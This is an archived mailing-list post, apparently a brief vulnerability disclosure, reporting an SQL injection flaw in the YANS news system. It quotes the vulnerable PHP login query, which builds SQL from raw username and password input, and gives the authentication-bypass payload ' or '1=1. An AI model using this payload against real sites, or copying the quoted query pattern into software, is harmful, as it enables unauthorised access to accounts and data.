Y.A.N.S sql injection

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Product: YANS (yet another news system)
Link: http://sourceforge.net/projects/yans/

vuln code:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'") or die (mysql_error());
        
simple sql injection
' or '1=1
' or '1=1

-navairum

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux